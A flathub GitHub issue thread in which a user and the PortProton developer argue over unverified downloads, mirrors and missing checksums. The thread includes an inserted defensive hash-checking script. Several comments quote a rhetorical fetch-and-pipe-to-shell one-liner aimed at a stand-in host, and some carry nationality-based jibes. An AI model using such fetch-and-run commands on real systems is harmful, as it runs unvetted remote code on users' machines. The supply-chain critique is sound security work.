flathub / flathub

Issue tracker and new submissions
https://docs.flathub.org/docs/for-app-authors/submission
GNU Lesser General Public License v2.1

License violation and suspicious app on Flathub #5195

Open tim77 opened 2 weeks ago

tim77 commented 2 weeks ago

App: ru.linux_gaming.PortProton

Where is the actual build manifest of this WINE/Proton build? It's a proprietary binary downloaded from an unclear source, and no one even knows how it was built. How is this even published under the MIT license? It's literally basically:

```bash
#!/usr/bin/bash
curl -O https://foo.ru/download_and_run_trojan_on_my_pc.sh | sh
```

How did this even pass the review?

Boria138 commented 2 weeks ago

The sources of the PortProton project can safely be found on Github: https://github.com/Castro-Fidel/PortWINE; custom versions of Proton and Wine with all patches are here: https://github.com/Castro-Fidel/wine_builds, so I consider the claim unfounded.

Boria138 commented 2 weeks ago

The portproton file on flathub is not a binary, it's a regular bash script that will soon be in upstream; before accusing people, at least bother to study the information.

tim77 commented 2 weeks ago

There are even two different mirrors in the build scripts for Russian speakers and non-Russians:

```bash
# choose mirror
if [[ -z "$MIRROR" ]] \
&& [[ "$LANGUAGE" == "ru" ]]
then
    echo 'export MIRROR="CDN"' >> "$USER_CONF"
    export MIRROR="CDN"
elif [[ -z "$MIRROR" ]] ; then
    echo 'export MIRROR="GITHUB"' >> "$USER_CONF"
    export MIRROR="GITHUB"
fi
```

Boria138 commented 2 weeks ago

> There are even two different mirrors in the build scripts for Russian speakers and non-Russians:
>
> ```bash
> # choose mirror
> if [[ -z "$MIRROR" ]] \
> && [[ "$LANGUAGE" == "ru" ]]
> then
>     echo 'export MIRROR="CDN"' >> "$USER_CONF"
>     export MIRROR="CDN"
> elif [[ -z "$MIRROR" ]] ; then
>     echo 'export MIRROR="GITHUB"' >> "$USER_CONF"
>     export MIRROR="GITHUB"
> fi
> ```

CDN costs money, and not a small amount, so it is used only by Russian users who have a problem with github; also, the mirror can be easily changed. And how did the topic even jump to the CDN?

tim77 commented 2 weeks ago

What exactly does this script download, and from where, and how can we be sure that it is legal and not malicious?

tim77 commented 2 weeks ago

What exactly does this script download, and from where, and how can we make sure that it is legal (allowed for redistribution) and not malicious?

Boria138 commented 2 weeks ago

> What exactly does this script download, and from where, and how can we make sure that it is legal (allowed for redistribution) and not malicious?

https://github.com/Castro-Fidel/PortWINE/releases https://github.com/Castro-Fidel/wine_builds/releases

Here is everything that is used in PortProton; everything is the same on cdn.linux-gaming.ru

Boria138 commented 2 weeks ago

If the fact that the cdn is only used in a certain country, because it is expensive to use a cdn worldwide, is enough to say that PortProton spreads viruses, then I have nothing to say.

Boria138 commented 2 weeks ago

Absolutely everything that is in PortProton is 100% open except Steam Runtime Sniper, but it is not used in the flatpak and in general is taken directly from Steam, so once again I repeat: before accusing the PortProton project of something, provide evidence.

tim77 commented 2 weeks ago

> > What exactly does this script download, and from where, and how can we make sure that it is legal (allowed for redistribution) and not malicious?
>
> https://github.com/Castro-Fidel/PortWINE/releases https://github.com/Castro-Fidel/wine_builds/releases
>
> Here is everything that is used in PortProton; everything is the same on cdn.linux-gaming.ru

> The portproton file on flathub is not a binary

Exactly what I wrote in the original post: it's a script which downloads binaries which no one can reproduce, and even from different mirrors: https://github.com/Castro-Fidel/wine_builds/releases/download/PROTON_LG_9-4/PROTON_LG_9-4.tar.xz The second one, on one mirror, is not even on github and downloads from a .ru domain.

tim77 commented 2 weeks ago

> Absolutely everything that is in PortProton is 100% open

Yeah, except the proprietary blobs from your local PC which are downloaded by your script published on Flathub.

Boria138 commented 2 weeks ago

> https://github.com/Castro-Fidel/wine_builds/releases/download/PROTON_LG_9-4/PROTON_LG_9-4.tar.xz

The link https://cdn.linux-gaming.ru/PROTON_LG_9-4.tar.xz downloads exactly the same file as from the git

Boria138 commented 2 weeks ago

> > Absolutely everything that is in PortProton is 100% open
>
> Yeah, except the proprietary blobs from your local PC which are downloaded by your script published on Flathub.

At least one proprietary component that you can't look into, please

Boria138 commented 2 weeks ago

> Exactly what I wrote in the original post: it's a script which downloads binaries which no one can reproduce, and even from different mirrors:

Specifically, this script only downloads the master branch from https://github.com/Castro-Fidel/PortWINE; about the cdn, for the second time I repeat: the separation is done to save money, but at the same time you can change the mirror with one button in the gui. I guess if the purpose was to infect the computer, then it would not be possible to switch to git, where you can see everything.

Boria138 commented 2 weeks ago

[screenshot: Screenshot_20240428_234507]

Find a piece of code related to changing mirrors and make sure it's not just a stub

Boria138 commented 2 weeks ago

> downloads from a .ru domain.

I didn't like this part at all. Why emphasize that the domain is .ru, although it is not hidden and is written literally in the id PortProton? Do you have some kind of personal dislike specifically for Russians?

tim77 commented 2 weeks ago

> so once again I repeat: before accusing the PortProton project of something, provide evidence

Please tell me, on what basis should I provide evidence, and not you, as the app developer? How could anyone reproduce your blobs downloaded by the script published on Flathub? https://reproducible-builds.org/ I asked you a second time and you still can't give a clear answer to this question.

And how long ago did `curl -O https://foo.ru/download_and_run_trojanblob_on_my_pc.sh | sh` begin to be called open source? And when did it become allowed to be published?

Boria138 commented 2 weeks ago

> > so once again I repeat: before accusing the PortProton project of something, provide evidence
>
> Please tell me, on what basis should I provide evidence, and not you, as the app developer? How could anyone reproduce your blobs downloaded by the script published on Flathub? https://reproducible-builds.org/ I asked you a second time and you still can't give a clear answer to this question.
>
> And how long ago did `curl -O https://foo.ru/download_and_run_trojanblob_on_my_pc.sh | sh` begin to be called open source? And when did it become allowed to be published?

The PortProton project is fully open, as well as all its scripts; custom versions of wine and proton are easily assembled using scripts from the wine_builds repository. I don't see any proprietary blobs that you are talking about.

Boria138 commented 2 weeks ago

And as for the evidence: you claim that PortProton is a proprietary product that should not be in flathub; I prove the opposite using links that show all the sources and the buildbot. Is it not normal for me to demand proof of your words, because at the moment you have not provided sufficient evidence that PortProton is a proprietary product?

Boria138 commented 2 weeks ago

In general, I do not see any point in continuing the dialogue without any real evidence of your accusations, as well as with possible bias on your part; I suggest waiting for an authorized person from flathub and only then continuing.

tim77 commented 2 weeks ago

> > https://github.com/Castro-Fidel/wine_builds/releases/download/PROTON_LG_9-4/PROTON_LG_9-4.tar.xz
>
> The link https://cdn.linux-gaming.ru/PROTON_LG_9-4.tar.xz downloads exactly the same file as from the git

1. You pointed at a link with precompiled sources, a blob. Before that you stated many times that there aren't any proprietary blobs. I already asked you two times how to reproduce these blobs — no answer.

> downloads exactly the same file as from the git

2. Should we take your word for it? There are not even any checks in the build process that this downloaded tarball is deterministic. Moreover, by priority, the first attempt is to download from the .ru source and only then from github:

```bash
echo -e "\nTry download scripts from gitlab.eterfund.ru..."
if ! curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
    -L "https://gitlab.eterfund.ru/Castro-Fidel/PortWINE/-/archive/master/PortWINE-master.tar.gz" \
    -o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
then
    echo -e "\nError.\nTry download scripts from github.com..."
    curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
    -L "https://github.com/Castro-Fidel/PortWINE/archive/refs/heads/master.tar.gz" \
    -o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
    [ "$?" != "0" ] && fatal "Critical error during file download!"
fi
echo "Try unpacking scripts..."
tar -xvzf "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz" -C "${PORT_WINE_TMP_PATH}"
```

The contents of this PortWINE-master.tar.gz could be changed at any time. Anything could be added/changed there and it will be impossible to even see the change. It will be impossible to even view and track the commit history, as is the case with github.
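The download-then-unpack sequence quoted above has no pin on what it fetches: the URL names a branch (`master`) that can change between two downloads, and nothing compares the tarball against a known hash before `tar` runs. The following POSIX-sh script is an added example written for this page, not code from PortProton, wine_builds, or the flathub repository. It shows the two checks that close that gap: accept only an immutable commit id as the archive reference, and refuse to unpack unless the SHA-256 matches a value recorded in advance. The repository URL, the commit id and the tarball used in the demo are constructed placeholders; `curl`, `tar` and `sha256sum` (or `shasum`) are assumed to be installed.

```shell
#!/bin/sh
# Added example (not PortProton or flathub code): pin what a wrapper downloads and
# fail closed on any mismatch. POSIX sh; assumes curl, tar, awk and sha256sum/shasum.
set -eu

# sha256_of FILE -> prints the hex SHA-256 of FILE (sha256sum on Linux, shasum elsewhere).
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# verify_sha256 FILE EXPECTED_HEX -> 0 if FILE hashes to EXPECTED_HEX, 1 otherwise.
verify_sha256() {
  [ "$(sha256_of "$1")" = "$2" ]
}

# archive_url_for_commit REPO_URL COMMIT -> prints REPO_URL/archive/COMMIT.tar.gz.
# A branch name such as "master" is refused: its archive can change between two
# downloads, so no hash can be pinned to it. Only a full 40-hex commit id is accepted.
archive_url_for_commit() {
  repo="$1"; ref="$2"
  case "$ref" in
    "" | *[!0-9a-f]*) echo "refusing mutable or malformed ref '$ref'" >&2; return 1 ;;
  esac
  [ "${#ref}" -eq 40 ] || { echo "ref '$ref' is not a full commit id" >&2; return 1; }
  printf '%s/archive/%s.tar.gz\n' "$repo" "$ref"
}

# unpack_verified TARBALL EXPECTED_HEX DEST -> unpack only if the hash matches.
# On mismatch nothing is extracted; the file is kept under a .rejected name so the
# bad download can be examined later, and the function fails.
unpack_verified() {
  tarball="$1"; expected="$2"; dest="$3"
  if ! verify_sha256 "$tarball" "$expected"; then
    echo "SHA-256 mismatch for $tarball; not unpacking" >&2
    mv -f "$tarball" "$tarball.rejected"
    return 1
  fi
  mkdir -p "$dest"
  tar -xzf "$tarball" -C "$dest"
}

# fetch_and_unpack REPO_URL COMMIT EXPECTED_HEX DEST: the hardened form of the
# curl-then-tar sequence quoted in the thread. Any mirror may serve the archive;
# a mirror that serves different bytes is rejected by the hash, not trusted by name.
fetch_and_unpack() {
  url="$(archive_url_for_commit "$1" "$2")" || return 1
  tmp="$(mktemp)"
  curl -fsSL --proto '=https' "$url" -o "$tmp"
  unpack_verified "$tmp" "$3" "$4"
}

# Offline demo with a constructed tarball (no network, no real project files).
demo() {
  work="$(mktemp -d)"
  mkdir -p "$work/src"
  printf 'echo hello\n' > "$work/src/run.sh"
  tar -czf "$work/src.tar.gz" -C "$work" src
  good="$(sha256_of "$work/src.tar.gz")"
  unpack_verified "$work/src.tar.gz" "$good" "$work/out" && echo "intact tarball unpacked"
  printf 'x' >> "$work/src.tar.gz"          # tamper with the archive after hashing
  if unpack_verified "$work/src.tar.gz" "$good" "$work/out2"; then
    echo "BUG: tampered tarball accepted"; return 1
  fi
  echo "tampered tarball rejected and kept as src.tar.gz.rejected"
  archive_url_for_commit https://github.com/example/repo master || echo "branch ref refused"
  rm -rf "$work"
}

demo
```

The expected hash lives with the wrapper (or in the Flatpak manifest as a `sha256` field), so updating the scripts means updating two literals, the commit id and the hash, and rebuilding; that is the cost the thread's author is being asked to pay in exchange for a download whose contents cannot change silently.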

Boria138 commented 2 weeks ago

> > > https://github.com/Castro-Fidel/wine_builds/releases/download/PROTON_LG_9-4/PROTON_LG_9-4.tar.xz
> >
> > The link https://cdn.linux-gaming.ru/PROTON_LG_9-4.tar.xz downloads exactly the same file as from the git
>
> 1. You pointed at a link with precompiled sources, a blob. Before that you stated many times that there aren't any proprietary blobs. I already asked you two times how to reproduce these blobs — no answer.
>
> > downloads exactly the same file as from the git
>
> 2. Should we take your word for it? There are not even any checks in the build process that this downloaded tarball is deterministic. Moreover, by priority, the first attempt is to download from the .ru source and only then from github:
>
> ```bash
> echo -e "\nTry download scripts from gitlab.eterfund.ru..."
> if ! curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
>   -L "https://gitlab.eterfund.ru/Castro-Fidel/PortWINE/-/archive/master/PortWINE-master.tar.gz" \
>   -o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
> then
>   echo -e "\nError.\nTry download scripts from github.com..."
>   curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
>   -L "https://github.com/Castro-Fidel/PortWINE/archive/refs/heads/master.tar.gz" \
>   -o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
>   [ "$?" != "0" ] && fatal "Critical error during file download!"
> fi
> echo "Try unpacking scripts..."
> tar -xvzf "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz" -C "${PORT_WINE_TMP_PATH}"
> ```
>
> The contents of this PortWINE-master.tar.gz could be changed at any time. Anything could be added/changed there and it will be impossible to even see the change. It will be impossible to even view and track the commit history, as is the case with github.

All scripts for building Proton are in wine_builds, with links to the sources; about git I do not understand: how can you change the master downloaded from git? Scripts are not downloaded from the cdn because they are small, so it is not possible to change anything in the process.

tim77 commented 2 weeks ago

This app should be removed from Flathub entirely as soon as possible; this fact alone is enough:

```bash
curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
    -L "https://gitlab.eterfund.ru/Castro-Fidel/PortWINE/-/archive/master/PortWINE-master.tar.gz" \
    -o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
```

Boria138 commented 2 weeks ago

> This app should be removed from Flathub entirely as soon as possible; this fact alone is enough:
>
> ```bash
> curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
>   -L "https://gitlab.eterfund.ru/Castro-Fidel/PortWINE/-/archive/master/PortWINE-master.tar.gz" \
>   -o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
> ```

gitlab.eterfund.ru is just a gitlab raised by etersoft; nothing can be changed there either

Boria138 commented 2 weeks ago

At the link https://gitlab.eterfund.ru/Castro-Fidel/PortWINE is absolutely the same source code as on github, because it's just a mirror of github; the push simply occurs in two places at once, that's all. Again, for the reason I have repeatedly voiced: github in CIS countries works terribly.

Boria138 commented 2 weeks ago

I don't understand: is it not normal practice to divide cercals by geo for the sake of economy? What makes you think that if a project has three mirrors there are viruses?

tim77 commented 2 weeks ago

> I don't understand: is it not normal practice to divide cercals by geo for the sake of economy? What makes you think that if a project has three mirrors there are viruses?

GOTO 10

Boria138 commented 2 weeks ago

> > I don't understand: is it not normal practice to divide cercals by geo for the sake of economy? What makes you think that if a project has three mirrors there are viruses?
>
> GOTO 10

How can one change the master branch on the git so that it can not be traced in any way?

Boria138 commented 2 weeks ago

gitlab is just a mirror of github which doesn't even have its own commits, and even if it did, what's the problem with looking at the history of changes and checking the downloaded files? I would understand if the gitlab was closed, but no, it's completely open.

Boria138 commented 2 weeks ago

To summarize: wine and proton can be built using scripts from wine_builds, and you can check that those built by you personally and those on the cdn are not different; scripts are downloaded directly from github / gitlab, where there is a history of commits.

tim77 commented 2 weeks ago

> > > I don't understand: is it not normal practice to divide cercals by geo for the sake of economy? What makes you think that if a project has three mirrors there are viruses?
> >
> > GOTO 10
>
> How can one change the master branch on the git so that it can not be traced in any way?

Easy. It is ridiculous to hear such a question from a person who is spreading his malware.tar.gz (without any deterministic checks during build) from their own git forge (gitlab.eterfund.ru), which is used in the first place. Without any real reason, since the project builds on Flathub, where Github has never been blocked, sanctioned, etc. So stop clowning, please.

Boria138 commented 2 weeks ago

> > > > I don't understand: is it not normal practice to divide cercals by geo for the sake of economy? What makes you think that if a project has three mirrors there are viruses?
> > >
> > > GOTO 10
> >
> > How can one change the master branch on the git so that it can not be traced in any way?
>
> Easy. It is ridiculous to hear such a question from a person who is spreading his malware.tar.gz (without any deterministic checks during build) from their own git forge (gitlab.eterfund.ru), which is used in the first place. Without any real reason, since the project builds on Flathub, where Github has never been blocked, sanctioned, etc. So stop clowning, please.

Clowning around here? I repeat once again: all commits are open and master does not change in the process of downloading. About flathub, this is nonsense; what is in flathub is just a script for installing and running PortProton, and all the main scripts are downloaded from gitlab, so sanctions and failures do matter.

Boria138 commented 2 weeks ago

I don't understand what the problem is. Your own gitlab? Then let's say that all gnome and kde projects are proprietary software; they are hosted on their own gitlab. I can point a finger in the sky at any project.

tim77 commented 2 weeks ago

> I don't understand what the problem is.

Neither GNOME nor KDE ever distributed a shady foo.tar.gz without at least a hashsum check during build. I have also never seen any app on Flathub that would spread such a hello_world_bash_script_kiddies_malware.sh. This is the first one. Especially marked "safe"! And of course you have never seen such malware as PortProton in any official repos of mainstream Linux distros, since this is not allowed for packaging.

Boria138 commented 2 weeks ago

> And of course you have never seen such malware as PortProton in any official repos of mainstream Linux distros, since this is not allowed for packaging.

https://packages.altlinux.org/en/sisyphus/srpms/portproton/

https://abf.io/import/portproton

Boria138 commented 2 weeks ago

> would spread such a hello_world_bash_script_kiddies_malware.sh

The bash script portproton is not encrypted in any way; everything that it does is visible in the script, all download sources are also known and open; all your claims are based only on your assumptions.

tim77 commented 2 weeks ago

> > And of course you have never seen such malware as PortProton in any official repos of mainstream Linux distros, since this is not allowed for packaging.
>
> https://packages.altlinux.org/en/sisyphus/srpms/portproton/
>
> https://abf.io/import/portproton

What point are you trying to make with this? :laughing: Alt Linux is a Russian distro. You just proved yourself that no distribution other than Alt Linux allows packaging russian_hello_world_malware? Thanks, now everything fits together!

tim77 commented 2 weeks ago

> > would spread such a hello_world_bash_script_kiddies_malware.sh
>
> The bash script portproton is not encrypted in any way; everything that it does is visible in the script, all download sources are also known and open; all your claims are based only on your assumptions.

GOTO 10

Why are you repeating the same thing over and over instead of admitting the mistake and fixing the build? You have already repeatedly said that we should only take your word. We don't even deserve at least a tarball hash check when downloading from a .ru source.

Boria138 commented 2 weeks ago

> > > would spread such a hello_world_bash_script_kiddies_malware.sh
> >
> > The bash script portproton is not encrypted in any way; everything that it does is visible in the script, all download sources are also known and open; all your claims are based only on your assumptions.
>
> GOTO 10
>
> Why are you repeating the same thing over and over instead of admitting the mistake and fixing the build? You have already repeatedly said that we should only take your word. We don't even deserve at least a tarball hash check when downloading from a .ru source.

Why don't you require a checksum for the version downloaded from github, but you don't like gitlab.eterfund.ru? What are the differences between github and gitlab? And you should believe not my words, but the history of commits, which is the same: if you download master from github and from gitlab, the hashes will be the same; if you want to check each file separately, no problem.

tim77 commented 2 weeks ago

> Why don't you require a checksum for the version downloaded from github

What? Flatpak does not even allow a build if there is no tarball hashsum check, or else it requires a fixed commit version for the source. That's why every source tarball has this hashsum check in the build manifest; it's already required by design. This is also a requirement for any mainstream Linux distro, and the alternative has never been allowed for packaging. This was also always a requirement of Flathub for FOSS apps. This is only acceptable if the app is marked as proprietary/non-free software with the corresponding unsafe flag. This just proves one more time that instead of simply fixing your build you still repeat over and over again your bla bla bla. Good luck with that.

Boria138 commented 2 weeks ago

> > Why don't you require a checksum for the version downloaded from github
>
> What? Flatpak does not even allow a build if there is no tarball hashsum check, or else it requires a fixed commit version for the source. That's why every source tarball has this hashsum check in the build manifest; it's already required by design. This is also a requirement for any mainstream Linux distro, and the alternative has never been allowed for packaging. This was also always a requirement of Flathub for FOSS apps. This is only acceptable if the app is marked as proprietary/non-free software with the corresponding unsafe flag. This just proves one more time that instead of simply fixing your build you still repeat over and over again your bla bla bla. Good luck with that.

There are no scripts inside the flatpak, there is only a startup script which then downloads scripts when the user launches the application itself, so I am not violating flatpak rules; the script itself lies open inside flathub, then moves to upstream with checksums and is still open. Where is the proprietary software? Everything on flathub is a wrapper; the scripts themselves are on git under the MIT license.

Boria138 commented 2 weeks ago

Inside flathub there is no assembly at all, there is just a wrapper; everything else (desktop and metainfo) is downloaded from upstream by tag and checksum, then at startup the scripts are downloaded.

Boria138 commented 2 weeks ago

If the wrapper downloaded scripts, for example, from a closed cdn, I would agree that it is proprietary software, but as it is nobody hides the links; the sources are under MIT, nothing is proprietary, and the claim that the master can change is pulled by the ears. Indeed the master can be changed, but we do not do it; the wrapper links do not change on the fly, and with git no manipulation happens either, so it is MIT; with the license I am not mistaken.

Boria138 commented 2 weeks ago

And I anticipate the argument that my words mean nothing and do not prove that the master does not change at download time. Here I can not say anything to prove my words, so it may sound really weak, but I really just can not think of a way to prove that the master branch is clean, either on github or on gitlab; but if you know such a way, I will be glad to cooperate.

tim77 commented 2 weeks ago

> the script itself lies open inside flathub, then moves to upstream with checksums and is still open. Where is the proprietary software?

Sure, who needs facts. It's enough just your words that you repeat a hundred times. GOTO 10

Facts, for the umpteenth time:

Now a question has arisen about Flathub's future: can everyone publish such a `curl -O https://foo.ru/download_and_run_trojan_on_my_pc.sh | sh` under the "MIT" license? Without any additional labels about safety on the Store page? Then it's time to think about whether users can trust Flathub.

Boria138 commented 2 weeks ago

> Binary blobs wine/proton and other binary stuff with the link provided by you. How to reproduce these builds I've asked you already three times — no answer.

What do you mean there is no answer? All three times I dropped the repository where there are links to all the sources, as well as all the necessary scripts for the build.

Boria138 commented 2 weeks ago

> There are no hash sum checks in the script, which downloads potentially ANY .tar.gz, which could be modified at any time on the fly.

The installation script always downloads the most recent commit in master because that's how versions work: a commit with a version is a new version, no releases. It's basically a git package, but it's not, because the versions are tested before the commit. I have nothing to check; master always has a different checksum; I would then have to update the flatpak at every script update, which is quite time consuming.

tim77 commented 2 weeks ago

> > Binary blobs wine/proton and other binary stuff with the link provided by you. How to reproduce these builds I've asked you already three times — no answer.
>
> What do you mean there is no answer? All three times I dropped the repository where there are links to all the sources, as well as all the necessary scripts for the build.

Exactly, all these three times mean that no one can reproduce these blobs, since this build is non-reproducible (https://reproducible-builds.org/). And they are not even built on Github infra. These are just proprietary blobs attached on the Release page. The only way to build the project is to run the download_and_run_trojan_on_my_pc.sh script, which downloads every_time_random_new_thing.tar.gz from gitlab.eterfund.ru (for no reason) without any deterministic checks and without any history of changes. Neither user, packager nor flathub_infra could even notice the change after rebuilding the package. This is the whole point and the problem with portproton.

Boria138 commented 2 weeks ago

> Exactly, all these three times mean that no one can reproduce these blobs, since this build is non-reproducible. And they are not even built on Github infra. These are just proprietary blobs attached on the Release page

Build scripts are here: https://github.com/Castro-Fidel/wine_builds; clone and build wine, everything is reproducible. And don't mix PortProton and the wine used in it into one mess; wine builds are not on gitlab.

Boria138 commented 2 weeks ago

> gitlab.eterfund.ru (for no reason)

For the thousandth time I explain: github in CIS countries feels terrible, so in the wrapper that downloads all the other scripts, gitlab has priority when running, because the complaints almost every day that PortProton is not downloading disappeared only when switching to gitlab.